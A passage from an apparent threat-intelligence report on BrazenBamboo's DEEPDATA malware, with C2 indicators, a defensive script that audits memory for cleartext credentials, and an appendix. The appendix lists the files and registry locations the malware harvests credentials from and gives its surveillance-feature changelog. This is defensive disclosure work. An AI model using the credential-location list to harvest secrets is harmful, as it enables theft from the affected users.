width="264">Shares a self-signed TLS certificate with all currently active DEEPDATA C2 servers</td> </tr> <tr> <td width="115"><code>103.27.108[.]207</code></td> <td width="275">ThreatFabric’s Mobile report</td> <td width="264">Shares a self-signed TLS certificate with all currently active DEEPDATA C2 servers</td> </tr> <tr> <td width="115"><code>121.201.109[.]98</code></td> <td width="275">Lookout’s DragonEgg report</td> <td width="264">Based on VirusTotal Intelligence URL submissions, Volexity assesses with moderate confidence this server historically hosted DEEPDATA plugins</td> </tr> </tbody> </table> <h2>Audit Exposed Credentials with Volexity Volcano</h2> <p style="font-weight: 400;"><a href="https://www.volexity.com/products-overview/volcano/">Volexity Volcano</a> is a powerful memory 
analysis framework that can help investigate systems compromised by this threat actor’s malware. It can also be used to proactively audit Windows, Linux, and macOS systems for other applications that expose credentials in clear text. One approach is to search memory for strings known to sit near the credentials, such as “remote_gateway” in this case, and examine what is stored around them. Another is to authenticate to a Fortinet VPN via FortiClient with a known password and then search memory for that value: immediately after authentication, again after an extended period of time, and, most importantly, after logging out, when the credential should no longer be present. Volcano attributes memory pages back to their owning process or kernel module, which ties each finding to the application that is not handling passwords as securely as it should.</p> <h2>Conclusion</h2> <p style="font-weight: 400;">Volexity’s analysis provides evidence that BrazenBamboo is a well-resourced threat actor who maintains multi-platform capabilities with operational longevity. The breadth and maturity of their capabilities indicate both a capable development function and operational requirements driving development output. 
This evidence, combined with the architectural decisions BrazenBamboo has made within their malware and related infrastructure, leads Volexity to assess with medium confidence that BrazenBamboo is a private enterprise that produces capabilities for governmental operators concerned with domestic targets.</p> <p style="font-weight: 400;">Some key elements supporting Volexity’s assessment are below:</p> <ul> <li>The language used in the C2 operator infrastructure references domestic surveillance and law enforcement contexts.</li> <li>There is a lack of operational security in the C2 infrastructure, which is atypical of foreign intelligence operations.</li> <li>The architecture decisions of DEEPDATA and LIGHTSPY are more typical of standard software development practices than of malware families.</li> <li>There is continued development and operation of LIGHTSPY despite a notable amount of public reporting on its capabilities and indicators.</li> <li>In recent years, this style of operation has become well publicized for China-based threat actors, with notable examples including <a href="https://www.fbi.gov/wanted/cyber/apt-41-group">Chengdu 404</a> and <a href="https://harfanglab.io/insidethelab/isoon-leak-analysis/">iSOON</a>.</li> </ul> <p style="font-weight: 400;">The timestamps associated with the latest payloads for DEEPDATA and LIGHTSPY are evidence that both malware families continue to be developed. 
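</p> <p style="font-weight: 400;">The memory audit described above under “Audit Exposed Credentials with Volexity Volcano” can be prototyped without a commercial tool. The Python script below is an added example, not Volexity’s or Volcano’s code. It scans a raw memory image for a marker string such as <code>remote_gateway</code>, carves the printable strings stored around each hit, and separately searches for the password value the auditor logged in with, in both ASCII and UTF-16LE, so the same check can be repeated on an image taken after an extended period and after logout. Everything in the sample data is constructed: the memory images, the JSON-like layout around the marker (not FortiClient’s real memory layout), the process names (<code>vpnclient.exe</code> is a placeholder, not FortiClient’s process name), and the page-to-owner table. A real memory-forensics tool derives page ownership from the kernel’s memory-management structures, which this script does not do.</p>

```python
"""Audit a raw memory image for cleartext credentials.

Added example (not Volexity or Volcano code). It prototypes the two checks the
page describes: (1) find a marker string known to sit near the credentials,
such as "remote_gateway", and carve the strings stored around it; (2) search
for a password value the auditor logged in with, then repeat the search on an
image taken after logout. Page-to-process attribution is modelled with a
constructed lookup table; a real memory-forensics tool derives it from the
kernel's memory-management structures, which this script does not do.
"""
import re
from dataclasses import dataclass, field

PAGE_SIZE = 0x1000
# Printable runs of at least four characters, in ASCII and in UTF-16LE
# (the encoding most Windows APIs hold strings in).
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


@dataclass
class Hit:
    offset: int          # byte offset in the image
    owner: str           # process or module owning the page
    encoding: str        # "ascii" or "utf-16le"
    context: list = field(default_factory=list)  # strings carved around the hit


def encodings(value: str) -> dict:
    """Both byte forms a string is likely to take in a Windows process."""
    return {"ascii": value.encode("ascii"), "utf-16le": value.encode("utf-16-le")}


def owner_of(offset: int, page_owners: dict) -> str:
    """Map an offset to its owning process via the (constructed) page table."""
    return page_owners.get(offset // PAGE_SIZE, "<unattributed>")


def carve_strings(blob: bytes) -> list:
    """Printable strings in a byte window, ASCII first, then UTF-16LE."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RE.finditer(blob)]
    return found


def _scan(image: bytes, value: str, page_owners: dict, window: int) -> list:
    hits = []
    for enc, needle in encodings(value).items():
        pos = image.find(needle)
        while pos != -1:
            context = []
            if window:
                lo, hi = max(0, pos - window), pos + len(needle) + window
                context = carve_strings(image[lo:hi])
            hits.append(Hit(pos, owner_of(pos, page_owners), enc, context))
            pos = image.find(needle, pos + 1)
    return hits


def find_marker(image: bytes, marker: str, page_owners: dict, window: int = 128) -> list:
    """Check 1: locate a marker string and carve what is stored around it."""
    return _scan(image, marker, page_owners, window)


def find_secret(image: bytes, secret: str, page_owners: dict) -> list:
    """Check 2: every copy of a known password value, with its owning page."""
    return _scan(image, secret, page_owners, window=0)


def owners_holding(image: bytes, secret: str, page_owners: dict) -> set:
    """Owners whose pages still contain the secret; empty is the goal after logout."""
    return {h.owner for h in find_secret(image, secret, page_owners)}


# --- constructed sample data (not a real FortiClient memory layout) ---
def build_image(pages: dict, n_pages: int = 4) -> bytes:
    """Zero-filled image with the given bytes placed at the start of each page."""
    out = bytearray(PAGE_SIZE * n_pages)
    for idx, data in pages.items():
        out[idx * PAGE_SIZE: idx * PAGE_SIZE + len(data)] = data
    return bytes(out)


# Placeholder process names; a real tool derives these from kernel structures.
PAGE_OWNERS = {0: "vpnclient.exe", 1: "vpnclient.exe", 2: "explorer.exe", 3: "ntoskrnl"}
PASSWORD = "Hunter2!2024"  # the value the auditor authenticated with
CONFIG_BLOB = (b'{"remote_gateway":"vpn.example.test:443","username":"alice","password":"'
               + PASSWORD.encode("ascii") + b'"}')
# During the session: an ASCII config blob plus a UTF-16 copy of the password.
DURING_SESSION = build_image({0: CONFIG_BLOB, 1: PASSWORD.encode("utf-16-le")})
# After logout: the blob was freed and zeroed, but a UTF-16 copy lingers in the client's heap.
AFTER_LOGOUT = build_image({1: b"\x00" * 64 + PASSWORD.encode("utf-16-le")})

if __name__ == "__main__":
    for h in find_marker(DURING_SESSION, "remote_gateway", PAGE_OWNERS):
        print(f"marker at 0x{h.offset:x} in {h.owner} ({h.encoding}): {h.context}")
    for label, image in (("during session", DURING_SESSION), ("after logout", AFTER_LOGOUT)):
        print(label, "->", owners_holding(image, PASSWORD, PAGE_OWNERS) or "clean")
```

<p style="font-weight: 400;">Run both snapshots through <code>owners_holding()</code>: an application that scrubs its credentials returns an empty set for the after-logout image, whereas the constructed image still attributes a lingering UTF-16 copy to the client process. Against a real host, acquire one image with the VPN client connected and another after logout, and feed both through the same functions; the marker search is what tells you where to look when you do not already know the credential value.</p> <p style="font-weight: 400;">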
The backend infrastructure BrazenBamboo maintains to analyze the data its malware families retrieve offers insight into the scale of this collection: the volume is large enough to drive a requirement for custom analyst software to process it at scale.</p> <p>To detect the malware used in this specific attack, Volexity recommends the following:</p> <ul> <li>Use the YARA rules provided <a href="https://github.com/volexity/threat-intel/blob/main/2024/2024-11-15%20BrazenBamboo/rules.yar">here</a> to detect related activity.</li> <li>Block the IOCs provided <a href="https://github.com/volexity/threat-intel/blob/main/2024/2024-11-15%20BrazenBamboo/iocs.csv">here</a>.</li> </ul> <blockquote><p>Volexity's Threat Intelligence research, such as the content from this blog, is published to customers via its <a href="https://www.volexity.com/services-overview/threat-intelligence/">Threat Intelligence Service</a>. The details published in this post were shared with customers in a series of posts between February 2024 and August 2024. 
Volexity <a href="https://www.volexity.com/services-overview/network-security-monitoring/">Network Security Monitoring</a> customers are also automatically covered by signatures and detections deployed for the threats and IOCs described in this post.</p> <hr /> <p>If you are interested in learning more about Volexity products and services, please do not hesitate to <a href="https://www.volexity.com/company/contact/">contact us</a>.</p></blockquote> <h2>Appendix</h2> <h3>DEEPDATA AccountInfo Plugin Targets</h3> <table class="table table--style-2" style="font-weight: 400;"> <thead> <tr> <td width="144"><strong>Targeted Service</strong></td> <td width="480"><strong>Credential Theft Technique</strong></td> </tr> </thead> <tbody> <tr> <td width="144">Baidu Net Disk</td> <td width="480">In memory</td> </tr> <tr> <td width="144">OneDrive</td> <td width="480">By hooking web requests in the legitimate process</td> </tr> <tr> <td width="144">KeePass</td> <td width="480">In memory, by using the open-source tool <a href="https://github.com/denandz/KeeFarce">KeeFarce</a></td> </tr> <tr> <td width="144">QQ</td> <td width="480">On disk</td> </tr> <tr> <td width="144">Windows</td> <td width="480">By using <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></td> </tr> <tr> <td width="144">Mail Master</td> <td width="480">On disk, by querying an internal <code>mail.db</code> file</td> </tr> <tr> <td width="144">Foxmail</td> <td width="480">On disk, by reading the <code>Account.rec0</code> file</td> </tr> <tr> <td width="144">SquirrelSQL</td> <td width="480">On disk, by reading the <code>SQLAliases23.xml</code> file</td> </tr> <tr> <td width="144">DbVisualizer</td> <td width="480">On disk, by reading the <code>dbvis.xml</code> file</td> </tr> <tr> <td width="144">OpenSSH</td> <td width="480">On disk, by reading the config and SSH key files</td> </tr> <tr> <td width="144">MobaXterm</td> <td width="480">In registry</td> </tr> <tr> <td width="144">WinSCP</td> <td width="480">In registry</td> </tr> <tr> <td width="144">SecureCRT</td> <td width="480">On disk, by reading the configuration files</td> </tr> <tr> <td width="144">PuTTY</td> <td width="480">In registry</td> </tr> <tr> <td width="144">Navicat</td> <td width="480">In registry</td> </tr> <tr> <td width="144">DBeaver</td> <td width="480">On disk, by reading the <code>credentials-config.json</code> file</td> </tr> <tr> <td width="144">Xshell</td> <td width="480">On disk, by reading the sessions files</td> </tr> <tr> <td width="144">Xftp</td> <td width="480">On disk, by reading the sessions files</td> </tr> </tbody> </table> <h3><a id="Appendix2"></a>DEEPDATA Change Log [English Translation]</h3> <blockquote> <p style="font-weight: 400;"><code>{<br /> "count":18, "next":null, "previous":null, "results":[ {<br /> "id":23, "time":"2023-10-1310036", "content":"{\"title\":\"v3.2\",\"text\":\"1. Add tg local real-time monitoring;\\n2. tg secret capture and add template parameter configuration;\\n3. Repair the obtained problems with data display;\\n4. Chat software adds Telegram display;\"}"<br /> }, {<br /> "id":22, "time":"2023-06-30151833", "content":"{\"title\":\"v3.1\",\"text\":\"1. Opera Browser is added to the browser type\\n2. Yandex module is added to cookie crawler parsing\\n3. WhatsApp parsing is redone\\n4. Newly added Signal chat software\\n5. Evidence collection mode and monitoring mode can be configured in the template\"}"<br /> }, {<br /> "id":21, "time":"2023-05-1218630", "content":"{\"title\":\"v3.0\",\"text\":\"1. Add a new monitoring version, the client is online in real time, and realize websocket communication;\\n2. Add the function of issuing environmental recording instructions;\\n3. Add the online command issuance function for other functions; \\n4. Fix the problem of program blocking for continuous command issuance; \\n5. 
Optimize the recording command issuance interface; \"}"<br /> }, {<br /> "id":20, "time":"2023-01-2917537", "content":"{\"title\":\"V2.1\",\"text\":\"1. Added data upload display for Outlook emails\\n2. Fix a bug in Outlook and support OneDrive acquisition.\\n3. Fixed the process list upload size field out-of-range bug\"}"<br /> }, {<br /> "id":19, "time":"2022-11-1118244", "content":"{\"title\":\"V2.0\",\"text\":\"1. Added target instant messaging software forensic information, including: Enterprise WeChat; forensic content includes session information, session chat content, contact information, and chat files;\"}"<br /> }, {<br /> "id":17, "time":"2022-09-17185754", "content":"{\"title\":\"V1.5.1\",\"text\":\"1. Added the ability to obtain network card and session information; \\n2. Fixed the bug of not being able to go online when the terminal MAC is empty; \\n3. Remove batches of local data, drivers, users, and browser passwords; \\n4. Repair bug in template configuration instructions not being executed;\\n5. Add new specified files (folders) to upload;\\n6. Add export cache files to chat software;\\n7. Add batch export of emails;\\n8. Fix system permission acquisition bug in wx home directory failure;\"}"<br /> }, {<br /> "id":16, "time":"2022-08-29182530", "content":"{\"title\":\"V1.5\",\"text\":\"1. The program supports input parameter acquisition tasks, and adds module configuration, which can build in the default extraction function;\\n2. Modify the execution loading method and use rundll32 for loading;\\n3. Program encryption processing;\\n4. Simple data extraction through anti-virus processing, loading data.dll through 360, etc.;\\n5. New template configuration function for the website;\\n6. Local data improvement data details: port status, service company name, process command line parameters, etc.;\\n7. New chat software WhatsApp, zalo;\\n8. 
Other website bug fixes;\"}"<br /> }, {<br /> "id":15, "time":"2022-07-1518245", "content":"{\"title\":\"v1.4\",\"text\":\"1. Add local data (service list, port list, user list, process list, driver list) display\\n2. Fix the problem of incorrect content in downloading email data attachments\\n3. Fix the problem of garbled Chinese characters when opening data exported to CSV in WPS\\n4. Fix the problem of incorrect user names when crawling Yahoo mailboxes\\n5. Fix the problem of Baidu network disk crawling error\\n6. Fix the problem of JD crawling data not being associated\"}"<br /> }, {<br /> "id":14, "time":"2022-07-0910226", "content":"{\"title\":\"v1.3\",\"text\":\"1. When optimizing the local directory search, when the content contains special characters, the returned content is inaccurate\\n2. Optimize the timeout of deleting old data when re-parsing local directory files, and delete it in the celery task instead\\n3. Fix the problem of Chromium browser obtaining mailbox cookies\\n4. Fix the problem of wx.mail.com and WeChat scan-code login to QQ mailbox not crawling emails\\n5. Fix the problem of crawling communication in QQ mailbox\\n6. Optimize file directory acquisition, from only obtaining c:/user to obtaining all files under the C drive outside the system folder\\n\"}"<br /> }, {<br /> "id":12, "time":"2022-07-0116723", "content":"{\"title\":\"v1.2.6\",\"text\":\"1. Add batch export of chat data including WeChat, Line, DingTalk, Skype, Feishu\\n2. Add batch export of browser data, including browser history, browser cookies\\n3. Add export task display, export progress, and download functions.\\n4. Fix the problem of WeChat voice files not being found\\n5. Fix the bug of obtaining the file directory under system permission\\n6. Automatically delete the file version after the output execution program is completed\\n7. 
Fix the Skype update version modification program get cookie path\"}"<br /> }, {<br /> "id":11, "time":"2022-06-25101259", "content":"{\"title\":\"v1.2.5\",\"text\":\"1. Optimize the method of Skype forensics from directly uploading TOKEN to directly uploading cookie files\\n2. Skype forensic information analysis module adds cookie file parsing operation\\n3. Add target machine file directory information upload, including file size data, supports searching for files or folders in specified directories\\n4. Fix the bug of losing Skype chat records when crawling files/voices/videos and other message records\\n5. Fix the problem of program crash when executing under system permissions\"}"<br /> }, {<br /> "id":10, "time":"2022-06-11122341", "content":"{\"title\":\"v1.2.4\",\"text\":\"1. New target group management\\n2. New system user management and role management\\n3. New target forensic data deletion, including specific forensic batch data deletion (including data + files), all batch deletion, terminal delete\"}"<br /> }, {<br /> "id":9, "time":"2022-06-04122318", "content":"{\"title\":\"v1.2.3\",\"text\":\"1. New display of travel evidence collection data, including travel account information, order list, common consignee addresses (contact information)\\n2. New display of evidence collection documents, including records of previous evidence collection documents, the number of evidence collection documents, and a re-analysis function\\n3. New log audit function, including the operation log of the platform system, the forensic log of the forensic tool, and the analysis log of the forensic file\"}"<br /> }, {<br /> "id":8, "time":"2022-05-28122318", "content":"{\"title\":\"v1.2.2\",\"text\":\"1. New target WIFI information collection, including surrounding WIFI list, local WIFI password\\n2. 
Newly added e-commerce forensic data display, including e-commerce account information, order list, common consignee address (contact information)\"}"<br /> }, {<br /> "id":7, "time":"2022-05-21122318", "content":"{\"title\":\"v1.2.1\",\"text\":\"1. Added target instant messaging software forensic information, including Feishu and Skype; forensic content includes session information, session chat content, contact information, chat files\\n2. New instant messaging data display, including session information, session members, contact (friends) list, chat content, chat files, etc., supporting various commonly used operating functions, such as session retrieval, chat content retrieval (including contextual viewing), chat file retrieval\"}"<br /> }, {<br /> "id":6, "time":"2022-05-14122318", "content":"{\"title\":\"v1.1.2\",\"text\":\"1. Added target instant messaging software forensic information, including Line and DingTalk; forensic content includes session information, session chat content, contact information, chat files\\n2. New browser cookies are added to collect evidence on target network identity data information, including\\n 2.1 E-commerce forensics (such as JD.com, Taobao, Meituan)\\n 2.2 Travel evidence collection (Ctrip, Qunar.com)\\n3. New email forensic data display, including email account information, email folder information, email list, email EML content\"}"<br /> }, {<br /> "id":5, "time":"2022-05-07122318", "content":"{\"title\":\"v1.1.1\",\"text\":\"1. Add target instant messaging software forensic information, including WeChat; forensic content includes session information, session chat content, contact information, and chat files\\n2. New browser cookies are added to collect evidence on the target network identity data information, including\\n 2.1. 
Email forensics (such as NetEase email, QQ mailbox, 139 mailbox, 189 mailbox, Yahoo mailbox, Hotmail mailbox, Gmail mailbox, etc.)\"}"<br /> }, {<br /> "id":4, "time":"2022-04-25122318", "content":"{\"title\":\"v1.1.0\",\"text\":\"1. Add target basic information collection, including machine name, IP address, MAC address, brand, model, operating system, resolution, memory, CPU, etc.\\n2. Add target browser data information, including browser access records, browser cookie information, browser password information\"}"<br /> }<br /> ]<br /> }</code></p></blockquote> <div class="post-tags"> <a href="https://www.volexity.com/blog/tag/apt/">APT</a>, <a href="https://www.volexity.com/blog/tag/brazenbamboo/">brazenbamboo</a>, <a href="https://www.volexity.com/blog/tag/china/">China</a>, <a href="https://www.volexity.com/blog/tag/exploits/">exploits</a>, <a href="https://www.volexity.com/blog/tag/forticlient/">forticlient</a>, <a href="https://www.volexity.com/blog/tag/fortinet/">Fortinet</a>, <a href="https://www.volexity.com/blog/tag/threat-intelligence/">Threat Intelligence</a> </div> </div> </article> </section> </div> </main> </body> </html>
